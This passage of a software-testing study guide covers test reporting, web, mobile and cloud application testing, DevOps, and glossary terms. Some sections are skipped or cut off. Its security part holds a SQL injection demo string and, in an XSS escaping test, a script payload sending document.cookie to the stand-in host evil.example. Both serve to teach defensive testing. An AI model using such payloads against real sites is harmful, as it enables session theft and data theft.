• Integration test
• System test
The individual who wrote the unit normally conducts unit testing. The objective is to assure
all the functions in the unit perform correctly, and the unit structure performs correctly. The
report should focus on what was tested, the test results, defects uncovered and, what defects
have not been corrected, plus the unit tester’s recommendations as to what should be done
prior to integration testing.
Skill Category 5, Test Planning, presented a system test plan standard that identified the
objectives of testing, what was to be tested, how it was to be tested, and when tests should
occur. The System Test Report should present the results of executing that Test Plan.
Figure 9-5 illustrates the test reporting standard that is based on the test plan standard.
1. Compare project results against the enterprise baseline. Lessons learned from projects scoring above the enterprise baseline can be used to improve those projects that are marginal or fall below the enterprise baseline.
2. Use good report writing practices. The following are examples of good report writing:
• Allow project team members to review the draft and make comments before the report
is finalized.
• Don’t include names or assign blame.
• Stress quality.
• Limit the report to two or three pages stressing important items; include other
information in appendices and schedules.
• Eliminate small problems from the report and give these directly to the project people.
• Hand-carry the report to the project leader.
• Offer to have the testers work with the project team to explain their findings and
recommendations.
Skill Category 10
Testing Specialized Technologies
The skill sets required by today's software test professional in many ways mirror Moore's Law. Paraphrasing just a bit, Moore's Law states that advances in technology will double approximately every 18 to 24 months. While it is true that some testers on legacy projects still test applications where the origin of the COBOL code may, in fact, stretch back to 1965 when Gordon Moore, co-founder of Intel, coined Moore's Law, the reality is that the skill sets needed today are advancing rapidly and have become more and more specialized.
To be clear, calling something specialized does not mean that the discussions about life
cycles, test preparation, planning, test techniques, measurement, managing the project or
leading the team are different. Quite the contrary, regardless of the technology the majority of
the skills and tasks performed are applicable with the customization that any project might
require. What this section deals with is the added nuances that certain technologies require for
testing. Discussed here will be such things as testing web and mobile applications, testing cloud-based applications, Agile, security, and DevOps. For each of these, the nature of the technology
and its impact on testing will be described.
As organizations acquire new technologies, new skills are required because test plans need to
be based on the types of technology used. Also, technologies new to the organization and the testers pose technological risks that must be addressed in test planning and test execution. It is important to keep in mind that any technology new to the testers or the organization, whether it is "technologically new" or not, should be considered a new technology for the purpose of risk analysis and subsequent test planning.
The following are the more common risks associated with the use of technology new to an IT
organization. Note that this list is not meant to be comprehensive but rather representative of
the types of risks frequently associated with using new technology:
• Unproven technology
The technology is available, but there is not enough experience with the use of that
technology to determine whether or not the stated benefits for using that technology
can actually be received.
• Technology incompatible with other implemented technologies
The technologies currently in place in the IT organization may be incompatible with the new technology acquired. Therefore, the new technology may meet all of its
stated benefits but the technology cannot be used because of incompatibility with
currently implemented technologies.
• New technology obsoletes existing implemented technologies
Many times when vendors develop new technologies, such as a new version of
software, they discontinue support of the existing software version. Thus, the
acquisition of new technology involves deleting the existing technologies and
replacing it with the new. Sometimes vendors do not declare the current technologies
obsolete until there has been general acceptance of the new technology. If testers do
not assume that older technologies will become obsolete they may fail to address the
significant new technology risk.
There are many variations within the web system architecture, but for illustration purposes the
above diagram is representative.
The notion of thin-client and thick-client processing has been around since ancient times, say
20 to 30 years ago. In the olden days thin-client typically referred to a “dumb” terminal where
a CRT and keyboard served as the user interface and all program execution happened on a
remote system (e.g., mainframe computer). More recently, the term thin-client is used to refer
to the relationship between the browser executing code with the majority of execution taking
place on a web server. When the majority of processing is executed on the server-side, a
system is considered to be a thin-client system. When the majority of processing is executed
on the client-side, a system is considered to be a thick-client system.
In a thin-client system, the user interface runs on the client host while all other components
run on the server host(s). The server is responsible for all services. After retrieving and
processing data, only a plain HTML page is sent back to the client.
By contrast, in a thick-client system, most processing is done on the client-side; the client
application handles data processing and applies logic rules to data. The server is responsible
only for providing data access features and data storage. Components such as ActiveX
controls and Java applets, which are required for the client to process data, are hosted and
executed on the client machine.
Each of these systems calls for a different testing strategy. In thick-client systems, testing
should focus on performance and compatibility. If Java applets are used, the applets will be
sent to the browser with each request, unless the same applet is used within the same instance
of the browser.
Compatibility issues in thin-client systems are less of a concern. Performance issues do,
however, need to be considered on the server-side, where requests are processed, and on the
network where data transfer takes place (for example, sending bitmaps to the browser). The
thin-client system is designed to solve incompatibility problems as well as processing-power
limitations on the client-side. Additionally, thin-client systems ensure that updates happen immediately, because the updates are applied on the server side only.
Functional correctness – Testers should validate that the application functions correctly. This
includes validating links, calculations, displays of information and navigation. See section
10.2.2 for additional details.
Integration – Testers should validate the integration between browsers and servers,
applications and data, and hardware and software.
Usability – Testers should validate the overall usability of a web page or a web application,
including appearance, clarity, and navigation.
Accessibility – Testers should validate that people with disabilities can perceive, understand,
navigate, and interact with the web-based application under test. (Section 508 of the United
States Rehabilitation Act requires that all United States Federal Departments and Agencies
ensure that all Web site content be equally accessible to people with disabilities. This applies
to Web applications, Web pages, and all attached files. It applies to intranet as well as public-
facing Web pages.)
Security – Testers should validate the adequacy and correctness of security controls,
including access control and authorizations.
The very nature of web-based applications and the architecture involved create higher risks to
the organization deploying the application. The simple risk calculation is Risk = Likelihood of Failure × Cost of Failure. Web applications often increase both factors in the equation.
Web applications often see a higher level of use than traditional applications. Web apps are
often customer facing and can see traffic in the thousands if not millions of hits per day. With
the higher level of use comes a higher likelihood of failure.
Whenever products or services are customer facing, the cost of failure grows exponentially.
Many companies have been defined by the failures of their web applications. The roll-out in
2013 of the US Government’s Affordable Care Act website was so catastrophic that it tainted
the entire presidential administration.
It is critical when planning for testing that detailed analysis of the application system be done
so test resources can be apportioned appropriately to minimize the risks inherent in the
deployment of a web application.
For testing an existing website, test planning should include the use of:
Web Analytics – A great tool for planning web testing is the use of analytics. Web analytics
can help the testers understand the patterns of use on the application site. Analytics can
provide measures and metrics such as page views, exit rates, time on site, and visits.
Browser Usage – One of the challenges of web testing is “uncontrolled user interfaces” also
known as browsers. Web site tools allow the tester to understand what browsers and what
versions of the browsers are being used to access the web application and what types of
mobile user platforms are accessing the site. By analyzing the current patterns the tester can
set up the test environment to test on the different browsers and mobile devices identified.
Note this would now be testing the web application on a mobile device. Mobile application
testing is discussed in section 10.3.
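As an illustration of how browser-usage data can drive the test environment, the sketch below takes hypothetical traffic shares and selects the browser/version combinations needed to cover a chosen percentage of observed traffic (all figures are invented):

# Sketch: using (hypothetical) analytics data on browser share to decide which
# browser/version combinations the test environment should cover first.
browser_share = {
    ("Chrome", "120"): 0.41, ("Safari", "17"): 0.22, ("Edge", "120"): 0.14,
    ("Firefox", "121"): 0.09, ("Chrome", "119"): 0.06, ("Samsung Internet", "23"): 0.05,
    ("Other", "-"): 0.03,
}
COVERAGE_TARGET = 0.90  # cover at least 90% of observed traffic

cumulative = 0.0
test_matrix = []
for (browser, version), share in sorted(browser_share.items(), key=lambda kv: kv[1], reverse=True):
    test_matrix.append((browser, version, share))
    cumulative += share
    if cumulative >= COVERAGE_TARGET:
        break

for browser, version, share in test_matrix:
    print(f"Test on {browser} {version} ({share:.0%} of traffic)")
print(f"Planned coverage: {cumulative:.0%} of observed traffic")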
Behavior Map – Understanding the behavior of visitors to a website helps the tester prioritize
test cases to exercise both the most frequently accessed portions of an application and the most common user movements. Heat maps are tools that essentially overlay a website and
track the user’s interaction. Heat maps track interactions such as clicks, scrolls, and mouse
movements. These tools provide a detailed picture on how the user moves around a site which
can help the testers better plan the test procedures.
During the planning phase and more specifically when planning for test automation the tester
should identify all the various page objects and response items such as:
• Entry fields, buttons, radio buttons, checkboxes, dropdown list boxes, images, links,
etc.
• Responses that may be rendered in tables, spans, divs, list items (lis), etc.
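One common way to catalog these page objects for automation is a page-object class; the sketch below assumes Selenium WebDriver is installed, and the URL and locators are hypothetical:

# Sketch of a simple page-object class that catalogs the entry fields, buttons,
# and response elements a test will interact with. Locators and the URL are
# hypothetical; assumes Selenium WebDriver and a browser driver are installed.
from selenium import webdriver
from selenium.webdriver.common.by import By

class LoginPage:
    URL = "https://example.com/login"          # hypothetical page under test

    def __init__(self, driver):
        self.driver = driver

    def open(self):
        self.driver.get(self.URL)

    def log_in(self, username, password):
        self.driver.find_element(By.ID, "username").send_keys(username)   # entry field
        self.driver.find_element(By.ID, "password").send_keys(password)   # entry field
        self.driver.find_element(By.CSS_SELECTOR, "button[type=submit]").click()  # button

    def error_message(self):
        # Response element (e.g., a div) shown when login fails.
        return self.driver.find_element(By.CSS_SELECTOR, "div.error").text

if __name__ == "__main__":
    driver = webdriver.Chrome()
    page = LoginPage(driver)
    page.open()
    page.log_in("tester", "wrong-password")
    assert "invalid" in page.error_message().lower()
    driver.quit()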
Browser differences can make a web application appear and/or act differently to different
people. The list given here is not intended to be exhaustive but rather is a sample.
Visual page display – Web applications do not display the same way across all browsers. Test
as many browsers as possible to ensure that the application under test (AUT) works as
intended.
Print handling – To make printing faster and easier, some pages add a link or button to print
a browser-friendly version of the page being viewed.
Reload – Some browser configurations will not automatically display updated pages if a
version of the page still exists in the cache. Some pages indicate if the user should reload the
page.
Navigation – Browsers vary in the ease of navigation, especially when it comes to visiting
pages previously visited during a session.
Graphics filters – Browsers may handle images differently, depending on the graphic files
supported by the browser. In fact, some browsers may not show an image at all.
Caching – How the cache is configured will have an impact on the performance of a browser
to display information.
Scripts – Browsers may handle scripts (e.g., Flash or Ajax page loads) differently. It is
important to understand the script compatibility across browsers and as necessary measure the
load times to help optimize performance. If scripts are only compatible with certain browsers,
test to ensure that they degrade gracefully on others so that all users get the best possible
experience.
Dynamic page generation – This includes how a user receives information from pages that
change based on input. Examples of dynamic page generation include:
• Shopping cart applications
• Data search applications
• Calculated forms
File uploads and downloads – Movement of data to and from remote data storage
Email functions – Dynamic calls to email functionality will differ from browser to browser
and between native email programs.
Web applications, as with any application, need to work accurately, quickly, and consistently.
The web application tester must ensure that the product will deliver the results the user
intends. Some of the functional elements unique to web application testing are detailed in the
following sections:
10.2.4.2.1 Forms
The submission of forms is a key function on many websites. Whether the form is a request for information or a feedback survey, the testers must ensure that all field inputs are validated and
connections to back-end database systems store data correctly.
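A minimal sketch of such a form test is shown below; it assumes the requests package, and the endpoint URL, field names, and expected status codes are purely illustrative:

# Sketch: exercising a (hypothetical) feedback form endpoint with valid and
# invalid input to confirm that server-side validation behaves as expected.
import requests

FORM_URL = "https://example.com/feedback"   # hypothetical endpoint

def submit(payload):
    return requests.post(FORM_URL, data=payload, timeout=10)

valid = {"name": "Pat Tester", "email": "pat@example.com", "comments": "Works well."}
invalid = {"name": "", "email": "not-an-email", "comments": ""}

assert submit(valid).status_code == 200, "valid input should be accepted"
resp = submit(invalid)
assert resp.status_code in (400, 422), "invalid input should be rejected"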
Test to ensure that audio and video playback, animations and interactive media work correctly.
These components should function as expected and not break or slow down the rest of the app
while loading or running.
10.2.4.2.3 Search
A common function in web applications is the ability to search through content, files or
documentation. Tests are needed to ensure that the search engine comprehensively indexes this information, updates itself regularly, and is quick to look up and display relevant results.
Web applications frequently have different functionality available to different access groups.
Test to ensure that each group accesses the correct functions.
Web applications are integral parts to most people’s daily activities. Whether it is checking
banking information or ordering a book online, ensuring that web apps are easy to use is
critical. The web application should provide a quality front-end experience to all users. Some
of the conditions for consideration in usability testing include those listed in the following
sections.
10.2.4.3.1 Navigation
All links to and from the homepage should be prominent and point to the right destination
pages. A standard approach for testing forward and backward and other links should be
defined and used.
10.2.4.3.2 Accessibility
As discussed in section 10.2.2, testers must ensure that the application under test is easy to use
even for those with disabilities or impairments of vision or motor functions.
Like any application, the web app will invariably respond incorrectly at some point. As with
any error routines, the AUT should trap the error, display a descriptive and helpful message to
the user, and then return control to the user in such a fashion that the application continues to
operate and preserves the user’s data.
Central to usability is the ability of the user to use the system. Not all users will be equally
comfortable using a web application and may need assistance the first few times. Even
experienced users will question what to do at times and require assistance on specific items.
Testers should test the documentation and/or support channels to ensure they are easily found
and accessible from any module or page.
Standards for web design have had mixed success. Regardless of the lack of a recognized
standard there certainly are some de facto standards which should be followed. This allows
the web user the ability to move from website to website without re-learning the page layout
styles. An easy example is the underlining or color change of a word(s) indicating a hyperlink
to another page. Other de facto standards include: site log in, site log out, contact us, and help links/buttons being located in the top right corner of a web page. Such standards help to
alleviate the “hunting” necessary to find a commonly used option on various websites.
10.2.4.3.6 Layouts
Consistency across the web application for such items as central workspace, menu location
and functionality, animations, interactions (such as drag-and-drop features and modal
windows), fonts and colors is important.
Many web applications take input from users and store that data on a remote system (e.g.,
database server). It is critically important to validate that the application and data are protected
from outside intrusion or unauthorized access. Testers must validate that these vulnerabilities
do not exist in the AUT. Some of the common security issues are described here.
A common attack pattern is for a hacker, through a user input vulnerability, to execute a SQL
command on the app’s database, leading to damage or theft of user data. These generally
occur due to the improper neutralization of special elements used in SQL commands or OS
commands.
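The sketch below demonstrates the pattern with an in-memory SQLite database: a query built by string concatenation lets crafted input alter the SQL, while a parameterized query treats the same input as plain data (table and values are invented for the example):

# Sketch: the classic injection pattern and its mitigation. A query built by
# string concatenation lets crafted input change the SQL; a parameterized
# query neutralizes the special characters. Uses an in-memory SQLite database.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

malicious = "anything' OR '1'='1"

# Vulnerable: attacker-controlled text becomes part of the SQL statement.
unsafe_sql = f"SELECT * FROM users WHERE name = '{malicious}'"
print("unsafe rows:", conn.execute(unsafe_sql).fetchall())      # returns alice's row

# Safe: the driver binds the value, so the quote characters are just data.
safe_rows = conn.execute("SELECT * FROM users WHERE name = ?", (malicious,)).fetchall()
print("safe rows:", safe_rows)                                   # returns []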
XSS is a type of computer security vulnerability which enables attackers to inject client-side
script into web pages viewed by other users. This allows an attacker to send malicious content
from an end-user and collect some type of data from a victim.
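A simple unit-level check for this class of defect is to confirm that user-supplied content is HTML-escaped before rendering; the rendering helper below is hypothetical:

# Sketch: a unit-level check that user-supplied content is HTML-escaped before
# it is rendered into a page, so injected script tags arrive as inert text.
import html

def render_comment(user_text: str) -> str:
    # Hypothetical rendering helper: escape, then wrap in markup.
    return f"<p class='comment'>{html.escape(user_text)}</p>"

attack = "<script>document.location='http://evil.example/?c='+document.cookie</script>"
rendered = render_comment(attack)

assert "<script>" not in rendered
print(rendered)   # &lt;script&gt;... appears as text, not executable script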
SSL Certificates are small data files that digitally bind a cryptographic key to an
organization’s details. When installed on a web server, it activates a padlock and the https
protocol allowing secure connections from a web server to a browser. Testers must ensure that
HTTPS is used where required for secure transaction control.
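A basic check of this kind can be automated by opening a TLS connection, letting the default context validate the certificate chain and host name, and confirming the certificate is not close to expiry; the host below is a placeholder and outbound network access is assumed:

# Sketch: verifying that a site presents a valid certificate and that its
# expiry date is not imminent. Host name is illustrative only.
import socket
import ssl
import time

HOST = "example.com"

context = ssl.create_default_context()            # performs chain + hostname checks
with socket.create_connection((HOST, 443), timeout=10) as sock:
    with context.wrap_socket(sock, server_hostname=HOST) as tls:
        cert = tls.getpeercert()

days_left = int((ssl.cert_time_to_seconds(cert["notAfter"]) - time.time()) // 86400)
print(f"{HOST}: certificate valid for another {days_left} days")
assert days_left > 30, "certificate is close to expiry"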
Simply stated, mobile apps are the computer programs designed to run on those 7 billion
smartphones, tablet computers and other mobile devices. Many mobile apps are pre-installed
by the mobile device manufacturer while over a million apps are delivered through
application distribution platforms such as the Apple App Store (1.3 million apps as of June
2014), Google Play Store (1.3 million apps as of September 2014), Windows Phone Store
(300,000 apps as of August 2014), BlackBerry App World (236,601 apps as of October 2013)
and Amazon App Store (250,908 apps as of July 2014). Mobile apps are also written and
distributed within the closed environments of organizations.
Mobile applications can be classified into various domain areas which include: information,
social media, games, retail, banking, travel, e-readers, telephony, and professional (e.g.,
financial, medical, and engineering) to name a few. The risks associated with the different
domains vary and the resources expended on testing should correlate directly.
The characteristics of the mobile application environment create unique challenges for
application development and subsequent conditions that will require testing. Some of the
challenges presented by the mobile platform are:
• Compatibility:
CPU
Memory
Display size / resolution
Keyboard (soft / hard / external)
Touch functionality
• Multiple operating systems:
iOS versions
Android versions
Windows Mobile
Windows Phone
BlackBerry
• Data entry:
Typing on a smartphone keyboard, hard or soft,
takes 2-5 times longer than on a computer keyboard
External keyboards (Bluetooth)
Voice
• Unique functionality:
Location awareness (GPS + DB(s))
10.3.2.1 Functionality
Testers must validate that the Mobile App can perform the functionality for which it was
designed. Functionality testing should consider:
Happy, Sad and Alternate Paths – The tester must validate that the happy path, sad path and
the alternate paths through the application execute and return the expected result.
Installation Processes – Unlike most other types of applications, mobile apps are likely to be
installed by an end user on their own device. The tester must ensure that the installation
process works correctly and is easy to understand for the target audience.
Special Functionality – The mobile application, more so than most other application delivery
models, sports some interesting special functions. Functions such as:
• Orientation – Tester must validate, based on the design requirements, that the
application changes orientation with the movement of the mobile device and that the
display format presents the information in a fashion consistent with the design
specification.
• Location – If an application requirement is location awareness, the tester must
validate that the mobile device’s GPS or tower triangulation provides accurate location
coordinates and that those coordinates are utilized by the application as required.
• Gestures – Testing, as applicable, that gestures such as "pull to refresh" have been implemented correctly.
• Internationalization – Ensure that language, weights, and measures work correctly
for the location of the device.
• Barcode scanning – For mobile devices and applications that support barcodes or QR
codes, testers must validate correct operation.
• Hardware Add-ons – Tester must validate that any potential hardware add-ons (like a
credit card reader) function correctly with the application under test.
Regulatory Compliance – The tester must be aware of and validate any regulatory
compliance issues. Examples include Section 508 of the Rehabilitation Act, the Health Insurance Portability and Accountability Act (HIPAA) regulations, and data use
Privacy Laws.
10.3.2.2 Performance
Testers must validate that the Mobile App’s performance is consistent with stated design
specifications. The tester should integrate performance testing with functional testing to
measure the impact of load on the user experience. Tests should include:
• Load and stress tests when:
Many applications are open
System is on for long periods of time
Application experiences 2-3 times the expected capacity
When data storage space is exceeded
• Validate application opening time when:
Application is not in memory
Application has been pre-loaded
• Performance behavior when:
Low battery
Bad network coverage
Low available memory
Simultaneous access to multiple application servers
10.3.2.3 Usability
Providing a good user experience for ALL users is critical. The testers must ensure that the
application is clear, intuitive and easy to navigate. Considerations when testing the usability of
a mobile application are:
• Validate that the system status is visible.
• Test the consistency between what a user’s real-world experience would be and how
the application functions. An example might be how the natural and logical order of
things is handled.
• Test to validate that user control and freedom such as an emergency exit, undo, redo,
or rollback function has been implemented.
• Test to ensure consistency and standards that are followed as dictated by the specific
platform.
• Test to validate that error prevention has been done by eliminating error-prone
conditions and presenting users with a confirmation option.
• Test to validate that the application was designed in such a fashion that objects and
options are visible as necessary reducing the need for users to remember specific
functionality.
• Real estate is valuable on the mobile device screen. The tester should ensure that good aesthetics and a minimalist design have been applied. Examples might be ensuring that the
screen is clear of information which is irrelevant or rarely needed.
• As with all applications, mobile or otherwise, the way the application handles error
conditions is critically important to the user’s experience. The tester should validate
that the application traps errors, helps the user recognize the error condition by
providing easily understood verbiage, and then helps diagnose the problem and recover from the error condition.
• Finally, the tester should ensure that help and documentation is available for the user
as necessary.
Mobile applications will likely experience interruptions during execution. An application will
face interruptions such as incoming calls, text messages, or network coverage outage. The
tester should create tests to validate the application functions under these various types of
interruptions:
• Incoming and Outgoing SMS and MMS
• Incoming and Outgoing calls
• Incoming Notifications
• Cable Insertion and Removal for data transfer
• Network outage and recovery
• Media Player on/off
• Device Power cycle
10.3.2.5 Security
Mobile devices, by definition, are “mobile”. The mobility of the device and by extension the
applications and data greatly increases risk. Testers must check how the device is accessed
and the functions where system or data can be compromised. Areas of concern that must be
tested include:
• Unauthorized access
• Data leakage
• Re-authentication for sensitive activities
• “Remember me” functionality
• Authentication of back-end security protocols
• Searching device’s file system (if possible)
10.3.2.6 Interoperability
Mobile devices frequently connect to other devices to upload, download or share information.
The testers must validate that the system securely connects to and interfaces with other
systems appropriately. Areas that should be tested include:
• Data Exchange
Exchanging data with the app server, or DB server
Data upload after the device is off-line
• Invoking functionality
Notifications: tray, pop-up, update
Real-time messaging
Video streaming
• Application updates
The testers must validate that the system protects itself and its data when failures occur. Test
conditions must be identified that validate system reaction and response to:
• Battery low or failure
• Poor reception and loss of reception
• GPS loss
• Data transfer interruption
There are some specific tools dedicated to automating tests for mobile platforms. Some of the
different approaches include:
Remote control – A variety of mobile test tools provide easy and secure remote control
access to the devices under test using a browser.
Add-ons – Many software automation tools provide mobile testing add-ons to the existing
tools suite.
Testing Cloud-based Applications – Testing applications that are deployed in the cloud for
such cloud specific nuances as cloud performance, security of cloud applications, and
availability and continuity within the cloud.
The Cloud as a Testing Platform – Using the cloud environment to generate massive
distributed load tests, simulate a large number of mobile devices, or run functional and
performance monitors from all over the world.
Within the cloud computing definition are three service models available to cloud customers: Software as a Service (SaaS), Platform as a Service (PaaS), and Infrastructure as a Service (IaaS).
There are four deployment models that describe how the computing infrastructure that
delivers the services can be shared. The four models and basic characteristics are:
• Private Cloud
Operated solely for an organization
Managed by the organization or third party
Exists on-premises or off-premises
• Community Cloud
Shared by specific community of several organizations
Managed by the organizations or third party
Exists on-premises or off-premises
• Public Cloud
Available to general public
Managed by the organization or third party
Exists off-premises
• Hybrid Cloud
Composition of two or more clouds; remain unique entities
Bound together by standardized or proprietary technology
Exists on-premises or off-premises
Cloud-based applications, by their very definition, often run on hardware over which the application owner has little or no control. Further to that concern, cloud apps may well be
sharing the hardware and operating environments with other applications. This characteristic
of cloud based apps intensifies the need for performance and scalability testing.
Cloud based applications usually share resources and infrastructure with others. The tester
must give extra consideration to ensuring that data privacy and access control issues are
working correctly.
The cloud based application tester develops tests which both reactively and proactively test
that IT services can recover and continue even after an incident occurs.
Cloud applications are likely to consume external APIs and services for providing some of
their functionality.
10.6 DevOps
“The emerging professional movement that advocates a collaborative working relationship
between Development and IT Operations, resulting in the fast flow of planned work (i.e.,
high deploy rates), while simultaneously increasing the reliability, stability, resilience of the
production environment.”
Traditional development lifecycle approaches are not intended to deliver, nor can they deliver, at this pace. Enter DevOps.
The DevOps model creates a seamless integrated system moving from the development team
writing the code, automatically deploying the executable code into the automated test
environment, having the test team execute the automated tests, and then deployment into the
production environment. This process moves in one smooth integrated flow. Automation
plays a pivotal role in the DevOps process. The use of Continuous Integration tools and test
automation are the standard in the DevOps model.
Typical automated activities in the DevOps chain include:
• Store artifacts and build repository (configuration management for storing artifacts, results, and releases)
• Use of release automation tool to deploy apps into production environment
• Configure environment
• Update databases
• Update apps
• Push to users
Within DevOps, every action in the chain is automated. This approach allows the application
development team to focus on designing, coding, and testing a high quality deliverable.
Similar to the impact of Agile on the role of all individuals in the development cycle, DevOps
encourages everyone to contribute across the chain. Ultimately, the quality and timeliness of
the application system is the responsibility of everyone within the chain.
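To illustrate the idea of a fully automated chain, the toy sketch below runs build, automated test, and deploy stages in sequence and stops the flow on the first failure; the commands and script names are placeholders, not the syntax of any particular CI/CD product:

# Illustrative sketch only: a toy "pipeline runner" that chains build, automated
# test, and deploy steps and stops the flow on the first failure. Real DevOps
# pipelines would normally be defined in a CI/CD tool; the commands here are
# placeholders.
import subprocess
import sys

PIPELINE = [
    ("build",  ["python", "-m", "compileall", "src"]),        # placeholder build step
    ("test",   ["python", "-m", "pytest", "tests", "-q"]),    # automated test suite
    ("deploy", ["bash", "scripts/deploy.sh", "staging"]),     # placeholder deploy script
]

for stage, command in PIPELINE:
    print(f"--- {stage} ---")
    result = subprocess.run(command)
    if result.returncode != 0:
        print(f"{stage} failed; stopping the pipeline")
        sys.exit(result.returncode)

print("all stages passed; release promoted")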
Typically, IoT is expected to offer advanced connectivity of devices, systems, and services
that goes beyond machine-to-machine communications (M2M) and covers a variety of
protocols, domains, and applications.
1. Holler, J., et al. From Machine-to-Machine to the Internet of Things: Introduction to a New Age of Intelligence. 2014.
Appendix A
Vocabulary
Acceptance Criteria – A key prerequisite for test planning is a clear understanding of what must be accomplished for the test project to be deemed successful. Those things a user will be able to do with the product after a story is implemented. (Agile)
Act – If your checkup reveals that the work is not being performed according to plan or that results are not as anticipated, devise measures for appropriate action. (Plan-Do-Check-Act)
Access Modeling – Used to verify that data requirements (represented in the form of an entity-relationship diagram) support the data demands of process requirements (represented in data flow diagrams and process specifications).
Active Risk – Risk that is deliberately taken on. For example, the choice to develop a new product that may not be successful in the marketplace.
Alternate Path – Additional testable conditions are derived from the exceptions and alternative course of the Use Case.
Affinity Diagram – A group process that takes large amounts of language data, such as a list developed by brainstorming, and divides it into categories.
Analogous Percentage Method – A common method for estimating test effort is to calculate the test estimate as a percentage of previous test efforts using a predicted size factor (SF) (e.g., SLOC or FPA).
Application A single software product that may or may not fully support a
business function.
Black-Box Testing A test technique that focuses on testing the functionality of the
program, component, or application against its specifications
without knowledge of how the system is constructed; usually data
or business process driven.
Bottom-Up Begin testing from the bottom of the hierarchy and work up to the
top. Modules are added in ascending hierarchical order. Bottom-up
testing requires the development of driver modules, which provide
the test input, that call the module or program being tested, and
display test output.
Bottom-Up Estimation – In this technique, the cost of each single activity is determined with the greatest level of detail at the bottom level and then rolls up to calculate the total project cost.
Boundary Value Analysis – A data selection technique in which test data is chosen from the "boundaries" of the input or output domain classes, data structures, and procedure parameters. Choices often include the actual minimum and maximum boundary values, the maximum value plus or minus one, and the minimum value plus or minus one.
Branch/Decision Testing – A test method that requires that each possible branch on each decision point be executed at least once.
Cause and Effect Diagrams – A cause and effect diagram visualizes results of brainstorming and affinity grouping through major causes of a significant process problem.
Client The customer that pays for the product received and receives the
benefit from the use of the product.
Common Causes of Variation – Common causes of variation are typically due to a large number of small random sources of variation. The sum of these sources of variation determines the magnitude of the process's inherent variation due to common causes; the process's control limits and current process capability can then be determined.
Complete Test Set A test set containing data that causes each element of pre-
specified set of Boolean conditions to be true. In addition, each
element of the test set causes at least one condition to be true.
Completeness The property that all necessary parts of an entity are included.
Often, a product is said to be complete if it has met all
requirements.
Condition Testing A structural test technique where each clause in every condition is
forced to take on each of its possible values in combination with
those of other clauses.
Configuration Management Tools – Tools that are used to keep track of changes made to systems and all related artifacts. These are also known as version control tools.
Consistent Condition Set – A set of Boolean conditions such that complete test sets for the conditions uncover the same errors.
Constraints A limitation or restriction. Constraints are those items that will likely
force a dose of “reality” on a test project. The obvious constraints
are test staff size, test schedule, and budget.
Control Control is anything that tends to cause the reduction of risk. Control
can accomplish this by reducing harmful effects or by reducing the
frequency of occurrence.
Control Charts – A statistical technique to assess, monitor and maintain the stability of a process. The objective is to monitor a continuous repeatable process and the process variation from specifications.
Correctness – The extent to which software is free from design and coding defects (i.e., fault-free). It is also the extent to which software meets its specified requirements and user objectives.
Cost of Quality (COQ) – Money spent beyond expected production costs (labor, materials, equipment) to ensure that the product the customer receives is a quality (defect free) product. The Cost of Quality includes prevention, appraisal, and failure costs.
COTS Commercial Off the Shelf (COTS) software products that are
ready-made and available for sale in the marketplace.
Coverage-Based Analysis – A metric used to show the logic covered during a test session, providing insight to the extent of testing. The simplest metric for coverage would be the number of computer statements executed during the test compared to the total number of statements in the program. To completely test the program structure, the test data chosen should cause the execution of all paths. Since this is not generally possible outside of unit test, general metrics have been developed which give a measure of the quality of test data based on the proximity to this ideal coverage. The metrics should take into consideration the existence of infeasible paths, which are those paths in the program that have been designed so that no data will cause the execution of those paths.
Critical Listening The listener is performing an analysis of what the speaker said.
This is most important when it is felt that the speaker is not in
complete control of the situation, or does not know the complete
facts of a situation.
Critical Success Factors – Critical Success Factors (CSFs) are those criteria or factors that must be present in a software application for it to be successful.
Data Dictionary Provides the capability to create test data to test validation for the
defined data elements. The test data generated is based upon the
attributes defined for each data element. The test data will check
both the normal variables for each data element as well as
abnormal or error conditions for each data element.
Data Flow Analysis – In data flow analysis, we are interested in tracing the behavior of program variables as they are initialized and modified while the program executes.
Debugging The process of analyzing and correcting syntactic, logic, and other
errors identified during testing.
Decision Analysis This technique is used to structure decisions and to represent real-
world problems by models that can be analyzed to gain insight and
understanding. The elements of a decision model are the
decisions, uncertain events, and values of outcomes.
Decision Coverage A white-box testing technique that measures the number of, or
percentage of, decision directions executed by the test case
designed. 100% decision coverage would indicate that all decision
directions had been executed at least once during testing.
Alternatively, each logical path through the program can be tested.
Often, paths through the program are grouped into a finite set of
classes, and one path from each class is tested.
Decision Table A tool for documenting the unique combinations of conditions and
associated results in order to derive unique test cases for
validation testing.
Defect Tracking Tools – Tools for documenting defects as they are found during testing and for tracking their status through to resolution.
Design Level The design decomposition of the software item (e.g., system,
subsystem, program, or module).
Desk Checking The most traditional means for analyzing a system or a program.
Desk checking is conducted by the developer of a system or
program. The process involves reviewing the complete product to
ensure that it is structurally sound and that the standards and
requirements have been met. This tool can also be used on
artifacts created during analysis and design.
Driver Code that sets up an environment and calls a module for test.
Dynamic Assertion – A dynamic analysis technique that inserts into the program code assertions about the relationship between program variables. The truth of the assertions is determined as the program executes.
Ease of Use and Simplicity – These are functions of how easy it is to capture and use the measurement data.
Empowerment Giving people the knowledge, skills, and authority to act within their
area of expertise to do the work and improve the process.
Entrance Criteria Required conditions and standards for work product quality that
must be present or met for entry into the next stage of the software
development process.
Error Guessing Test data selection technique for picking values that seem likely to
cause defects. This technique is based upon the theory that test
cases and test data can be developed based on the intuition and
experience of the tester.
Exit Criteria Standards for work product quality, which block the promotion of
incomplete or defective work products to subsequent stages of the
software development process.
Exploratory Testing – The term "Exploratory Testing" was coined in 1983 by Dr. Cem Kaner. Dr. Kaner defines exploratory testing as "a style of software testing that emphasizes the personal freedom and responsibility of the individual tester to continually optimize the quality of his/her work by treating test-related learning, test design, test execution, and test result interpretation as mutually supportive activities that run in parallel throughout the project."
Failure Costs All costs associated with defective products that have been
delivered to the user and/or moved into production. Failure costs
can be classified as either “internal” failure costs or “external”
failure costs.
Force Field Analysis – A group technique used to identify both driving and restraining forces that influence a current situation.
Functional System Testing – Functional system testing ensures that the system requirements and specifications are achieved. The process involves creating test conditions for use in evaluating the correctness of the application.
Functional Testing Application of test data derived from the specified functional
requirements without regard to the final program structure.
Gap Analysis This technique determines the difference between two variables. A
gap analysis may show the difference between perceptions of
importance and performance of risk management practices. The
gap analysis may show discrepancies between what is and what
needs to be done. Gap analysis shows how large the gap is and
how far the leap is to cross it. It identifies the resources available to
Happy Path Generally used within the discussion of Use Cases, the happy path
follows a single flow uninterrupted by errors or exceptions from
beginning to end.
Inherent Risk Inherent Risk is the risk to an organization in the absence of any
